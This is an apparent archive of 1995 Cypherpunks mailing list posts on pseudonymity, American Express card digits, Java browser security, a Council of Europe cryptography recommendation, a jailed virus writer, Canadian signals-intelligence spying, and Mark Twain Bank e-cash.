Each of these messages is "anonymous" in one sense: I obtain virtually no information about the "identity" of the (biologically-relevant) individual who typed the notice or otherwise caused it to be transmitted to me (if indeed there is any such person). But it is hardly anonymous in another (and probably more significant) sense: the letterhead clearly identifies the "identity" of the more relevant actor (the DMV or McDonald's). The relevant actor here, i.e. the DMV or McDonald's, has a reality unconnected with the physical "identity" of any of its individual constituents (employees, officers, etc.); indeed, a notice from the DMV that is mistakenly placed on non-letterhead stationery (but that is signed by the typist) surely has less reliable information about the originator's "identity" than the reverse (i.e., an unsigned note placed on DMV letterhead). 4. Traceability itself is highly context-dependent, insofar as both the cost of obtaining additional identification information, and the value of that information in reducing uncertainty regarding identity, will vary, possibly greatly, from one situation to another. It may, for example, be relatively easy for a law enforcement official to obtain information regarding the identity of the individual who placed a particular phone call; the same information may be prohibitively difficult for other individuals to obtain. Traceability is also affected by (1) whether or not relevant identification information exists in the hands of third parties (i.e., parties other than the originator and recipient), (2) the third party's duty (or lack of a duty) to keep the information secret, and (3) the ease with which disclosure can be legally compelled (by process, subpoena, etc.). 5. Anonymity can thus be regarded as a subset of pseudonymity, with the critical difference being, for my purposes at least, that pseudonymity allows the accretion of reputational capital in the pseudonym. 6.
This stream may have a high degree of traceability -- if my electronic mail address is "Postd at law.georgetown.edu," for example, there at least appears to be information allowing the message to be traced to a real individual (though query, as always, how reliable that information may be). Or it may not -- the use of a screen name on America Online, or, in the extreme, the use of anonymous remailers. 7. Examples: the Cancelmoose; the Cyberspace Law Institute. 8. I use "regulation" in the broad sense, to include not only State action but the "regulatory" activities of e.g., individual system operators. 9. Note, in this regard, that protecting the "limited liability" features of pseudonymity does not necessarily mean that harms imposed on third parties by pseudonymous entities must go unredressed (as is the consequence of limited liability in the corporate context); because reputational capital is not transferable, i.e., is not useful for the purpose of compensating victims of harms perpetrated by pseudonymous entities, redress can be achieved by exposing individuals' financial assets, though not necessarily their personal identities, to risk when the pseudonymous entity acts, and there are various insurance and authentication/certification regimes that I will discuss to accomplish this. From Greg_Rose at sibelius.sydney.sterling.com Wed Nov 15 18:44:52 1995 From: Greg_Rose at sibelius.sydney.sterling.com (Greg ROSE) Date: Thu, 16 Nov 1995 10:44:52 +0800 Subject: Amex cards extra four digits In-Reply-To: <9511160031.AA41675@paganini.sydney.sterling.com> Message-ID: <9511160227.AA09304@paganini.sydney.sterling.com> -----BEGIN PGP SIGNED MESSAGE----- Oops, following up my own posting, it proves I should have been more careful... I wrote Wow, you learn something every day. I've never in my whole life (well, my American Express life, over 15 years) noticed those four digits. I've never been asked for them by anyone, or noticed them being written down, either. 
Exactly when and how are they used? But when I reread it I thought it sounded sarcastic. It isn't -- there really are an extra four digits printed on both my Amex cards that I'd never noticed before -- and my question is serious. Greg. Greg Rose INTERNET: greg_rose at sydney.sterling.com Sterling Software VOICE: +61-2-9975 4777 FAX: +61-2-9975 2921 28 Rodborough Rd. http://www.sydney.sterling.com:8080/~ggr French's Forest 35 0A 79 7D 5E 21 8D 47 E3 53 75 66 AC FB D9 45 NSW 2086 Australia. co-mod sci.crypt.research, USENIX Director. From ses at tipper.oit.unc.edu Wed Nov 15 18:45:31 1995 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Thu, 16 Nov 1995 10:45:31 +0800 Subject: credit card conventional wisdom (fwd) Message-ID: Date: Wed, 15 Nov 1995 18:07:25 -0800 From: Tom Wills To: Simon Spero Subject: Re: credit card conventional wisdom (fwd) The printed digits above the embossed account number are the first four digits of the BIN (on Visa cards) or ICA (on MasterCards). They are there to discourage re-embossing of the card with another account number. Original Message: > >Wow, you learn something every day. I've never in >my whole life (well, my American Express life, >over 15 years) noticed those four digits. I've >never been asked for them by anyone, or noticed >them being written down, either. Exactly when and >how are they used? From jsw at netscape.com Wed Nov 15 18:58:55 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Thu, 16 Nov 1995 10:58:55 +0800 Subject: Netscape rewards are an insult In-Reply-To: <199511151019.CAA18910@jobe.shell.portal.com> Message-ID: <30AAA306.64CF@netscape.com> Dr. Frederick B.
Cohen wrote: > On a closely related vein, Sun has announced that they are severely > limiting some functions in HotJava - from Risks-17-45: [ excerpts from Sun announcement deleted ] > I had a rather lengthy discussion with a gentleman from Sun at the CSI > conference last Tuesday night, and this announcement follows many of the > things we discussed very closely. This kind of consistency between what > people say and what the company published is refreshing, and it restores > my faith in Sun's desire to do things well. Of course there are still > some problems left unresolved: [ more of Sun announcement deleted ] > I do think that this response by Sun, regardless of the technical merits > of the particulars, demonstrates a desire to improve protection and a > willingness to listen. My compliments for that. All of these security measures are implemented by Netscape in the current release. Specifically, Netscape Navigator 2.0beta2 includes all the applet security precautions detailed in the recent comp.lang.java posting. Netscape has been shipping the fixed applet security model for over a month (since 2.0Beta1), and Netscape and Sun continue to cooperate and work closely on applet security issues. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From Greg_Rose at sibelius.sydney.sterling.com Wed Nov 15 19:06:56 1995 From: Greg_Rose at sibelius.sydney.sterling.com (Greg ROSE) Date: Thu, 16 Nov 1995 11:06:56 +0800 Subject: credit card conventional wisdom (fwd) In-Reply-To: Message-ID: <9511160242.AA41564@paganini.sydney.sterling.com> -----BEGIN PGP SIGNED MESSAGE----- The printed digits above the embossed account number are the first four digits of the BIN (on Visa cards) or ICA (on MasterCards). They are there to discourage re-embossing of the card with another account number. True for Visa cards, but false for the AMEX.
On my two Amex cards there is no obvious relationship between the four digit number and the embossed card number. Greg. From ses at tipper.oit.unc.edu Wed Nov 15 19:09:14 1995 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Thu, 16 Nov 1995 11:09:14 +0800 Subject: credit card conventional wisdom (fwd) In-Reply-To: Message-ID: Further info: The AMEX digits aren't part of the standard info- someone I spoke to who started off as a grey box programmer said that he thought they were just process control. Card-present/Card-not-present can be determined from info on the magnetic stripe; for visa cards, this info is stored in a three-digit checksum at the end of the discretionary info. Card Imprints taken with no online authorisation are typically charged a transaction fee of 3-6%: with authorisation, 1.5-3%. ATM card transactions are charged at around $0.10 per transaction. Simon From EALLENSMITH at ocelot.Rutgers.EDU Wed Nov 15 19:21:46 1995 From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH) Date: Thu, 16 Nov 1995 11:21:46 +0800 Subject: e$: Come aaaannnndddd Get it! Message-ID: <01HXORFUEO5Y8WY0P1@mbcl.rutgers.edu> From: rah at shipwright.com (Robert Hettinga) Sameer's done it, I'm going to do it, and I'm hoping that everyone who *can* do it *will*. Lumpy though MTB may be, they're taking a risk that no one else in the financial community would, and they deserve whatever support we can give 'em. If they do it and it works, there will be others. Come on, people, let's make it work. Put your e$ where your mouth is, or at least on a hard drive somewhere...
------------------- I will as soon as someone comes up with a _fully_ private digital cash system and starts using it for something. As I understand it, Chaum's ecash system is not one (i.e., non-privacy to the sender and of amounts to the bank). If I'm incorrect, please tell me and I'll set up an account with MTB immediately (if there's a text-based interface). -Allen From hallam at w3.org Wed Nov 15 19:24:19 1995 From: hallam at w3.org (Phillip M. Hallam-Baker) Date: Thu, 16 Nov 1995 11:24:19 +0800 Subject: COE Recommendation No. R (95) 13 Message-ID: <9511160302.AA17272@www18.w3.org> This is that Council of Europe "Ban Crypto" paper. It is of course nothing like what it is claimed to be http://www.privacy.org/pi/intl_orgs/coe/info_tech_1995.html In particular: 6. The law should permit investigating authorities to avail themselves of all necessary technical measures that enable the collection of traffic data in the investigation of crimes. "COLLECTION" - not comprehension 8. Criminal procedure laws should be reviewed with a view to making possible the interception of telecommunications and the collection of traffic data in the investigation of serious offenses against the confidentiality, integrity and availability of telecommunications or computer systems. This is simply to fix the German data protection laws and similar, some of which might prevent a sysop monitoring a hacker on a system they were hacking. I think the majority of the text is well thought out and very much in line with what we would want. The piece on encryption is a cop out to please the French and Dutch. Read it carefully and you will see it says absolutely nothing. We have been had again... Rule number one of politics, always assume that the enemy are misrepresenting their case. Council of Europe declarations are almost always implemented because they say almost nothing. 
It is a very clear statement of some concerns which it would be nice if the US authorities understood - separation of search and seizure. This is not a trend in which Europe is following the US. We are simply thinking about the effect of technology on law enforcement rather than reacting to its effects. Found this written up in cipher, well worth a visit. http://www.itd.nrl.navy.mil/ITD/5540/ieee/cipher/ -- Phillip M. Hallam-Baker Not speaking for anyone else hallam at w3.org http://www.w3.org/hypertext/WWW/People/hallam.html Information Superhighway -----> Hi-ho! Yow! I'm surfing Arpanet! From habs at warwick.com Wed Nov 15 19:41:42 1995 From: habs at warwick.com (Harry S. Hawk) Date: Thu, 16 Nov 1995 11:41:42 +0800 Subject: Java Security Class in Netscape (was: Netscape rewards are an insult) In-Reply-To: <30AAA306.64CF@netscape.com> Message-ID: <199511160324.WAA25357@cmyk.warwick.com> Jeff wrote: > All of these security measures are implemented by Netscape in the > current release. Specifically, Netscape Navigator 2.0beta2 > includes all the applet security precautions detailed in the recent > comp.lang.java posting. Netscape has been shipping the fixed > applet security model for over a month (since 2.0Beta1), and > Netscape and Sun continue to cooperate and work closely on applet > security issues. All of these are very conservative measures and they seem to be the best approach for the present. They do remove some of the more interesting features of Java. Sun commented to me in an interview that "we would not see a more complex security model until they adding encryption and digi-sig's, etc." My question is, can a corporate user replace the security class in Netscape? I understand that all the class libs are in an external file. While a virus might exploit this... my reason for asking is for corporate developers who are building "intra"net systems.. making some tweaks to the security class would give them the flexibility they need.
Otherwise we have taken much of the fun out of Java. (for good reasons). From hallam at w3.org Wed Nov 15 19:59:41 1995 From: hallam at w3.org (Phillip M. Hallam-Baker) Date: Thu, 16 Nov 1995 11:59:41 +0800 Subject: THE FRONT PAGE Message-ID: <9511160347.AA17470@www18.w3.org> I've edited this down, for fair use reasons, you can get the idea... Worth subscribing to this paper BTW. > The Electronic Telegraph Thursday 16 November 1995 The Front Page > > [The Front Page] > > 'Black Baron' computer virus writer jailed for 18 months > > By Robert Uhlig, Technology Correspondent > > Devils in disguise that preyed on computers > > THE man who wrote computer viruses which could cause millions of > > pounds of damage, was jailed for 18 months yesterday. > > Christopher Pile, who called himself the Black Baron, not only spread his own > viruses, Exeter Crown Court was told, but also distributed across the world his > program which let other hackers disguise their own viruses. > The viruses have made the "Black Baron" notorious among British companies. > Microprose estimated it lost up to £500,000 and used more than 480 staff hours > checking more than a million files. The computer firm Apricot had to shut down > and check many of its machines. It found that 22 out of 60 had been infected by > Pathogen. -- Phillip M. Hallam-Baker Not speaking for anyone else hallam at w3.org http://www.w3.org/hypertext/WWW/People/hallam.html Information Superhighway -----> Hi-ho! Yow! I'm surfing Arpanet! From byerr at netcom.com Wed Nov 15 21:10:22 1995 From: byerr at netcom.com (greeeeeeaaaaaat*) Date: Thu, 16 Nov 1995 13:10:22 +0800 Subject: Professional interview wanted for report Message-ID: <199511160456.XAA28418@netcom22.netcom.com> Hi. I'm a freshman at the Thomas Jefferson High School for Science and Technology in Fairfax County, Virginia.
I am writing a (general) report on cryptography for school, and I was wondering if anyone on this list that works with cryptography in their job would be able to give me a short interview over email. Thanks a lot! -- Ben Byer byerr at netcom.com I am not a bushing GCS d-- s: a--- C++ UL++++ P++ L++ E+ W+ N++ o K-- w-- !O M-- !V !PS !PE Y+(++) PGP t+ 5 !X R tv(+) DI+ G e- h! r !y From jirib at sweeney.cs.monash.edu.au Wed Nov 15 21:59:41 1995 From: jirib at sweeney.cs.monash.edu.au (Jiri Baum) Date: Thu, 16 Nov 1995 13:59:41 +0800 Subject: NSA, ITAR, NCSA and plug-in hooks. In-Reply-To: <9511142220.AA13813@sulphur.osf.org> Message-ID: <199511160546.QAA00358@sweeney.cs.monash.edu.au> -----BEGIN PGP SIGNED MESSAGE----- Hello Rich Salz and rsalz at osf.org, ses at tipper.oit.unc.edu and cypherpunks at toad.com, owner-cypherpunks at toad.com, and s1113645 at tesla.cc.uottawa.ca ... > >are specifically designed for the insertion of cryptographic materials, > >or is it the fact that they could be used to support cryptographic ... > Basically, generic buffer-manipulation is okay. "Keyed compression" > where you explicitly passed something called a key to a DLL routine > would be looked on suspiciously. ... Why would you call it a key? How about compression "options"? The compression algorithm could have a "speed" mode and a "size" mode. It could also have options for file type etc... Recipient id could be passed along to check which compression method the recipient knows. ... > An abstract set of open/modify/close > routines (where open returned a pointer to opaque state, say a session > key :) would be fine. ... So what's the difference... apart from what it's called? Jiri - -- If you want an answer, please mail to . On sweeney, I may delete without reading! 
PGP 463A14D5 (but it's at home so it'll take a day or two) PGP EF0607F9 (but it's at uni so don't rely on it too much) From combee at techwood.org Wed Nov 15 23:02:58 1995 From: combee at techwood.org (Ben Combee) Date: Thu, 16 Nov 1995 15:02:58 +0800 Subject: Need advice on video Message-ID: <199511160651.AAA29375@matrix.eden.com> Hello, fellow cypherpunks. This is my first post here on the global CP list, although I've been working with the just-reformed Austin chapter for the last couple of months. Us Austinites are working on a video for public access television on cryptography. We are looking at a one-hour format, similar to a science program, that will introduce cryptography, its history, the basic ideas of modern crypto, and what applications there are for it today and in the future. Now, this might turn into a series, but for now, we are concentrating on the overview episode. What I'm fishing for here are any suggestions for ways to present some of this content in an interesting video setting. We've already decided on doing some algorithm animation, and maybe some simple moving graphics illustrating the various protocols. Any ideas you might have would be appreciated. BTW, once we finish this and show it locally, we are considering doing some duplication to send out to interested bodies. Do you think there is demand for a good, clear intro to all this in video form? Thanks, -- eebmoC .L nimajneB | Benjamin L. Combee (REVERSE) gro.doowhcet at eebmoc | combee at techwood.org (ENGINEERING) \eebmoc\ten.kay.www\\:ptth | http://www.yak.net/combee/ (RESERVE) From fc at all.net Thu Nov 16 16:09:54 1995 From: fc at all.net (Dr. Frederick B.
Cohen) Date: Thu, 16 Nov 95 16:09:54 PST Subject: Java & Netscape security [NOISE] In-Reply-To: <9511161831.ZM14572@glacius.alias.com> Message-ID: <9511170006.AA17075@all.net> > Perhaps Dr. Fred fails to realise that some people *aren't* speaking > for their entire company every time they write e-mail. [see fc.all.net-- > i always enjoy pronouncing that nearly phonetically] I thought all Netscape and Sun communications come from their PR departments. You can't have it both ways. Your position seems to be: If employees make statements that work out, it's OK. If their statements don't work out, you disclaim them. This is baloney. When you work for Netscape or Sun and speak about your company's products, you are representing the company whether you disclaim it or not. ... > To have some slight cpunks relevance, I will weigh in on the side of > `It's not X's responsibility to ensure that Y's software isn't broken.' > {for all X, Y in {software developers}} Why? For the same reason that > I'm not generally held accountable for, say, Gary Jeffer's opinions > or Tim May's: because I don't have any control over them. So your claim is that Unix is perfectly secure for networking, because without inetd, sendmail, ident daemon, HTTP daemons, syslogd, and all those other add-on software pieces, if your users act perfectly and nobody ever makes a mistake, you are safe from known attacks. I think this is ridiculous. When sendmail has a bug, most Unix systems become insecure. When syslog has a bug, most Unix systems become insecure. These are commonly called Unix insecurities. When Postscript allows writing to files, most Web browsers become insecure - including Netscape, including HotJava. 
If the only commonly available postscript programs are insecure, the products have hooks designed to allow postscript to be used automatically to interpret programs from over the net, and servers commonly provide information in postscript format, the enabling technology (i.e., Netscape and Hot Java) is responsible for the vulnerability. If it only worked under Unix, people would call it a Unix vulnerability, but since it works under Windows and OS/2 and every other system that runs Netscape or HotJava, it is a Netscape and HotJava vulnerability. I would also call it a postscript vulnerability, EXCEPT that HotJava and Netscape ALSO provide hooks to command interpreters and other insecure software, so we can't just pin it on the add-ons. The common thread is the Web browser, and that's where the blame belongs. Not with the millions of users, not with the tens of add-ons, not with the various operating environments, but with the one common thread, the Web browser. -- -> See: Info-Sec Heaven at URL http://all.net/ Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From sameer at c2.org Thu Nov 16 16:15:04 1995 From: sameer at c2.org (sameer) Date: Thu, 16 Nov 95 16:15:04 PST Subject: Need to get your shop setup before friday? Message-ID: <199511170008.QAA29573@infinity.c2.org> If you need to get your shop set up before Friday, and don't have the time yourself to figure out how to install the CGI things, etc. Community ConneXion can do it for you, at our standard CGI web design rate. Call me at the number below, or page 510-321-1014.
-- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 The Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org/ (or login as "guest") sameer at c2.org From wiltship at iccu6.ipswich.gil.com.au Thu Nov 16 02:33:23 1995 From: wiltship at iccu6.ipswich.gil.com.au (PeterWiltshire) Date: Thu, 16 Nov 1995 18:33:23 +0800 Subject: credit card conventional wisdom Message-ID: <199511161019.VAA16813@iccu6.ipswich.gil.com.au> -----BEGIN PGP SIGNED MESSAGE----- Gidday Greg You wrote.. >Most consumer-level transactions are based on a general sort of >trust-in-human-nature sort of policy, backed up by the knowledge that a single >failed transaction (or even a constant low level of failed transactions, where >failed == "didn't get paid but gave the stuff away") isn't likely to kill off >a business or even make it unprofitable. Failed transactions are more likely to affect consumer confidence than trader confidence. I have yet to find a site on the net where goods are shipped before receiving payment, therefore the 'at risk' party is the buyer. Cybertraders will need to establish a level of credibility and reliability on a par with their terrestrial cousins. Cyberbuyers will need to be confident in their ability to call upon yet unwritten international laws to gain a refund or replacement when goods and services don't arrive as advertised. BTW do you want to buy a really big rock way out in the middle of nowhere? 
[:>) cheers Peter -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMKsP0uvjRao+WEx9AQGq5wP9EicYrEbW3wDoLZ8FcPSvp9b9qk3GhoQH H7pmHq3OvXr++DZHZqqzL2whvz24BvEA4DQ0mwPa1Te9EtIn/VGqbdv2UO23iI9H ysGX80T3wokORgKay157KC70aykgiafpHYb0t+hQxClN2FY/jTA5FiheGTaNERQc UkhP+wOg7zY= =qewX -----END PGP SIGNATURE----- Flight to Quality Wiltshire Productions Pty Ltd Brisbane, Queensland, Australia Intl Voice 61 7 3376 3535 Intl Fax 61 7 3279 4027 Email wiltship at gil.com.au PGP Key ID 3E584C7D PGP Fingerprint 01 03 FB F4 BE F8 2B F3 5D 84 6B 69 37 80 FE 10 From hallam at w3.org Thu Nov 16 19:50:52 1995 From: hallam at w3.org (hallam at w3.org) Date: Thu, 16 Nov 95 19:50:52 PST Subject: COE Recommendation No. R (95) 13 In-Reply-To: Message-ID: <9511170350.AA29590@zorch.w3.org> >How about this: >________________________________________________________________________ >9. Subject to legal privileges or protection, most legal systems permit >investigating authorities to order persons to hand over objects under >their control that are required to serve as evidence. In a parallel >fashion, provisions should be made for the power to order persons to >submit any specified data under their control in a computer system in the >form required by the investigating authority. >________________________________________________________________________ >Is this 'what we would want'? It clearly means that one can be ordered >to reveal the password to encrypted data and punished by law if one >refuses. Suppose they suspect you of being a child pornographer and >get a court order to search your encrypted system. You know you are >innocent. Is it acceptable to put you in jail for not giving them access >to your encrypted, very personal diary (in which you describe in detail >your sexual encounters with the wife of the Chief of Police)? Well if you want to eliminate all search and seizure powers of the courts then that is a valid point to make.
The point of the directive though is to point out to the legislatures that they have to consider their position on this one. I'm not particularly keen on the idea that we should hope that the legislatures let this type of change happen by default. They are not going to do that, they may let things slide but they then are more likely to do something reactionary when they realise they have been had. And that reaction is likely to be anal. >_______________________________________________________________________ >14. Measures should be considered to minimise the negative effects of the >use of cryptography on the investigation of criminal offenses, without >affecting its legitimate use more than is strictly necessary. >_______________________________________________________________________ >Is this really just a toothless statement to give to the French? Parse it carefully; its implications depend heavily on the interpretation of "legitimate use" and "strictly necessary". Point is that it is not a directive to implement a Euro-Clipper program which is what various spin doctors were claiming. The deputy director of the NSA tried to use it as evidence to support his claim that other countries are following the US position. Mind you I may be wrong about the French. Someone suggested today that they would prefer there to be no debate on crypto because they don't want people to find out what they are up to. Phill Phill From rsalz at osf.org Thu Nov 16 20:21:33 1995 From: rsalz at osf.org (Rich Salz) Date: Thu, 16 Nov 95 20:21:33 PST Subject: Java & Netscape security [NOISE] Message-ID: <9511170418.AA18604@sulphur.osf.org> >! I'm so tired of listening to this no-researching, ... Why do people seem to insist on telling the list when they killfile someone? Overall, isn't that just adding to the crap one has to sift through?
/r$ From rah at shipwright.com Thu Nov 16 04:29:25 1995 From: rah at shipwright.com (Robert Hettinga) Date: Thu, 16 Nov 1995 20:29:25 +0800 Subject: e$: Come aaaannnndddd Get it! Message-ID: At 8:57 PM 11/15/95, E. ALLEN SMITH wrote: >------------------- > I will as soon as someone comes up with a _fully_ private digital >cash system and starts using it for something. As I understand it, Chaum's >ecash system is not one (i.e., non-privacy to the sender and of amounts to the >bank). If I'm incorrect, please tell me and I'll set up an account with MTB >immediately (if there's a text-based interface). Ahhh. Next year in Jerusalem... Tell me, are you actually selling something on the net yet? How many customers do you have? Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971 "Reality is not optional." --Thomas Sowell The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From charles at europages.com Thu Nov 16 04:56:54 1995 From: charles at europages.com (charles at europages.com) Date: Thu, 16 Nov 1995 20:56:54 +0800 Subject: unsuscribe Message-ID: <9511161032.AA10705@europages.com> unsuscribe From Andrew_Barrett at checkfree.com Thu Nov 16 06:04:48 1995 From: Andrew_Barrett at checkfree.com (Andrew Barrett/CheckFree Corporation) Date: Thu, 16 Nov 1995 22:04:48 +0800 Subject: -No Subject- Message-ID: <9511161654.AA0590@6thstreetcheckfree.com> Over 2000 years ago, Nostradamus predicted that on Tuesday November 14, 1995, Phil would say: ><...>Or at least there is a requirement for the >assistant to enter the extra four digits in certain cases. The precise >nature of the circumstance when they are required to be card present I >am not sure (in fact I would bet they vary). I'm betting your bet is right.
When you set up your persona/nym for use with the CheckFree wallet, the software does ask for those four, non-embossed numbers on the Amex card - which I had never really noticed 'til then. And I frequently pass the amex number on the phone for business stuff. Just last week, I had flowers sent to some partners of ours that we had just completed a deal with (sorry...should have ordered them over the net), and the 4 "flat" numbers were not required. Hmmmm .... From anonymous-remailer at shell.portal.com Thu Nov 16 06:15:05 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Thu, 16 Nov 1995 22:15:05 +0800 Subject: CSE gets flak on TV Message-ID: <199511161400.GAA00778@jobe.shell.portal.com> On Tue, 14 Nov 1995 s1113645 at tesla.cc.uottawa.ca wrote: > For those who care, the Communications Security Establishment has been > getting some flak for spying on Mex. during NAFTA talks and on Korea to > help us sell Can. nuke reactors: > (This rather mirrors the trouble their sister agency, the NSA, has been > getting into) > (sorry the online newscasts were rather vague) Hmm, actually the news tape is reading a little strange here in Canada. Not AP, or REUTERS, but simply the Canadian Press newswire. Let's see ... over the last couple of days, we've had one provincial Premier resign over "BingoGate" -- kickbacks from bingo games, another premier is under some pretty heavy fire for some insider trading in a company he promoted in Hong Kong, (actually his wife got stock she never had to pay for), while Canada in conjunction with the normally very neutral Swiss have frozen accounts pertaining to about $20 million or so in kickbacks from Airbus Industries to a "senior Canadian politician". And all these stories ... coincidentally ... broke back to back. It's almost as though the country is disinfecting itself, or has taken one particularly powerful laxative. But the CSE story is really, really smelly. The worst of the whole lot.
I think that there might be more to this than appears on the surface. Maybe filling in some details might help our friends on this list. You listening, Perry??? * * * On Tue, 14 Nov 1995 s1113645 at tesla.cc.uottawa.ca wrote: > Electronic snooping part of the game > > > OTTAWA (CP)--Intelligence experts say it's no big secret that Canada's > high-tech spy agency snoops on friendly countries for financial gain. No big secret?? It was news to me. ;-) > Increasingly, intelligence agencies around the world are using their > antennas, computers and codebreakers to gather economic information, > Wesley Wark, a University of Toronto history professor, said Monday. > > Some of Canada's largest trading partners--including the United > States, France and Japan--comb the airwaves for useful information, so > Canada would be foolish not to join the game, said Wark. Wark actually continued here. He said: "I don't know what a friendly power in the economic sphere is, exactly, these days. That seems to be a very ambiguous term." (Of course, this is diplo-dodo-speak for something ... I think ... but I'm not sure what.) > Canada's secretive Communications Security Establishment--an arm of > the Defence Department--collects and analyses communications traffic > on the activities of foreign states, corporations and people. > > Jane Shorten, a former CSE employee, told CTV News in an interview > Sunday the agency spied on Canada's allies and trading > partners--including Mexico and South Korea--by eavesdropping on > embassies, consulates and diplomats. There was also a followup segment, broadcast Monday. I think that "Jane Shorten" said that the CSE intercepted telephone conversations and faxes of Canadians working at FOREIGN embassies in Canada. But Prime Minister Chretien, in ... New Zealand ... at a meeting of the Commonwealth did not deny Canada is spying on allies, but he did say that "This is an organization that works within the law of Canada". 
He also said, "They do not report to me on a daily basis and I cannot make any comments on if they are spying on anybody. I don't know. But they have the mandate to check a few things around the world. Probably somebody is listening to us at this moment." Later the Prime Minister said that if any laws have been broken, "somebody will have to pay the price." Ottawa maintains that the CSE, the NSA and their counterparts in Britain, Australia, and New Zealand have all agreed not to spy on each other. He also said that the CSE does not target Canadians and scrupulously abides by Canadian laws. "Jane Shorten" said in her Sunday broadcast, "I have lived with this information for so long and I just think that it is time that Canada knows what the CSE is doing." "Shorten" worked as an analyst for the CSE from 1986 to 1994 when she was laid off. "Shorten" said that the agency spied on Canada's allies and trading partners, eavesdropping on friendly embassies, consulates, and diplomats in Canada and around the world. Ottawa denies it. "Countries like Canada have understandings that they don't carry out these activities against each other." Solicitor General Herb Gray said earlier this year in response to claims that the US Central Intelligence Agency had spied on the Japanese delegation during auto trade talks in Geneva. "Shorten" however replied: "He does not know what's going on because CSE is certainly doing that ... I spied on the (South) Korean government for the Canadian government." [I think she was referring to Atomic Energy of Canada's sale of nuclear power plants ... possibly ... but I don't know, about AECL.] Today, it was reported by the deputy prime minister -- since the Prime Minister is away at an economic conference in Japan -- that there will be a review of operations to make sure that the Communications Security Establishment is obeying the law.
"And if, in fact, there has been illegal activity going on, we'll want to deal with that in as public a way as possible," said Sheila Copps. The Mexican government has presented a diplomatic note to Canada expressing "surprise and concern" over the report that it was spied on during the North American free-trade talks. South Korea is looking into the matter as well. The head of the Canadian Civil Liberties Association wants an independent committee to oversee CSE operations. Alan Bovoroy, angered by the suggestions of spying on Canadians, said a watchdog could put pressure on politicians to make changes if the CSE steps over the line. International diplomacy experts said the allegations of economic espionage wouldn't damage Ottawa's relations with the countries. -- E N D -- And I guess ... that's all of the news that I've got to this hour. Except for one brief note, that Prime Minister Chretien tried to call the States, but the Government shutdown meant that his call couldn't get through. I think he tried to call NASA. Speaking personally, I just think that something is a bit fishy. I mean "Jane Shorten" is a nym if I ever heard one ... probably married to "Dick Lengthen" or something. But putting my wry sense of haha, aside there are some serious questions. How does someone cleared for TOP SECRET UMBRA, like our dear "Jane Shorten" say, "I have lived with this information for so long and I just think that it is time that Canada knows what CSE is doing." And then later say: "I feel so strongly that its time that people learned what CSE is all about." I mean ... HELLO .... GiGGle TesT ... what on earth did she think the CSE did?? Made snowmen and skated on the Rideau Canal?? "Shorten" apparently is quite distraught, over the stepped up CSE operations in 1991. Operations targetted at foreign embassies in Canada. She recalled overhearing conversations of Canadians employed there -- even one woman's phone call to her doctor. 
She was appalled and confronted her boss, who assured her that the practice was legal. I mean, whop dee doo ... "Shorten" overheard a patient/doctor telephone call that a Canadian made from their place of work -- a foreign embassy. Did she listen with great intent and interest, or did she simply try not to listen?? If "Shorten" was so distraught at listening in on personal information, she should have closed her ears. I mean, this is Canada, what is the problem if we listen to people who work in embassies?? The agency IS obligated to destroy information about Canadians it scoops up in its electronic net. A rare exception might be a phone call describing a terrorist plot, but that would truly be exceptional, I think. I mean it's not like one big fishing expedition. In any event, "Jane Shorten" returned to Canada from New York, this last evening. She told CTV she was aware her revelations could result in prosecution under the Official Secrets Act but she felt the risk of prison was worth it. And that's the fleshed out version of the story. I'm just sorry that our Prime Minister is in such a bad position because of the timing of this "Jane Shorten's" revelations. She also revealed that Canada spied on Japan. To think ... Canadian Prime Minister Chretien is a guest of the Japanese people today. Talk about some awkward moments. I mean, what on earth do you talk about?? George Bush and Sushi?? Alice de 'nonymous ... ...just another one of those... ...hunters... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. From denap at isis.com Thu Nov 16 06:21:29 1995 From: denap at isis.com (Tom DeNapoli) Date: Thu, 16 Nov 1995 22:21:29 +0800 Subject: Q: blind maildrop anyone? Message-ID: <199511161409.JAA08809@polyphony.sw.stratus.com> Hi, I am not on this mailing list so please reply by email. It was recommended to me by someone who is on the list that you(s) might be able to point me to the right place (or page).
What I'd like to do is: establish an email account, other than the one I'm posting from; preferably on some free email/homepage box, that would encrypt all cleartext email to hit that account for me at this account. I have tried, unsuccessfully to establish this at c2, which offers this service. My question: has anyone done this successfully at c2, or another location, and be willing to point me in the right direction to accomplish this. thanks, -Tom Tom DeNapoli 26 EC 2B 5A 0B 54 6D EE 1C 3F B6 AE 14 AA 83 87 From rah at shipwright.com Thu Nov 16 06:30:00 1995 From: rah at shipwright.com (Robert Hettinga) Date: Thu, 16 Nov 1995 22:30:00 +0800 Subject: e$: Come aaaannnndddd Get it! Message-ID: I'm in the process of scrambling to get the e$ web page set up for e-cash before the deadline for *no-fee* *commercial* accounts at Mark Twain Bank this Friday, and who should answer the mail but fellow cypherpunk Lucky Green. So, Lucky tells me that *he's* the guy who beat up Chaum/MTB and Co. to prime the pump for web-vendors by offering *free* signup for e-cash accounts. Muchos Kudos to Lucky for making that happen. Sameer's done it, I'm going to do it, and I'm hoping that everyone who *can* do it *will*. Lumpy though MTB may be, they're taking a risk that no one else in the financial community would, and they deserve whatever support we can give 'em. If they do it and it works, there will be others. Come on, people, let's make it work. Put your e$ where your mouth is, or at least on a hard drive somewhere... http://www.marktwain.com/ecash.html Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971 "Reality is not optional." 
